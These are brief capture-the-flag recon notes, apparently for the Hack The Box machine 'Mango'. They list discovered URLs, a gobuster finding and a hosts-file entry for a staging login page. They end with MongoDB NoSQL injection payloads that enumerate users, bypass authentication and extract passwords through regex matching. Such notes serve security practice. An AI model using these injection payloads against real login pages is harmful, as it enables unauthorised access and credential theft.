https://10.10.10.162/analytics.php 

	--> https://www.flexmonster.com/
	--> Can connect, open, save, export csv files and more

https://10.10.10.162/
	-- search engine


gobuster: found /server-status (403 not priviliged )

Other links:

	https://static.codepen.io/assets/favicon/logo-pin-8f3771b1072e3c38bd662872f6b673a722f4b3ca2421637d5596661b4e2132cc.svg

	https://github.com/MangoDevelopers/mango-new-logo/

	https://static.codepen.io/assets/common/stopExecutionOnTimeout-de7e2ef6bfefd24b79a3f68b414b87b8db5b08439cac3f1012092b2290c719cd.js (codepen.js)

	https://cdn.flexmonster.com/codepen.ke



Edit /etc/hosts file for staging-order.mango.htb => Login Page

LOGIN PAGE

	Use mongodb NOSQLI

		* enumerate users: username=<user>&password[%24ne]=
		* bypass login: username=admin&password[%24ne]=
		* find passwords: username=admin&passowrd[$regex]=<letter>
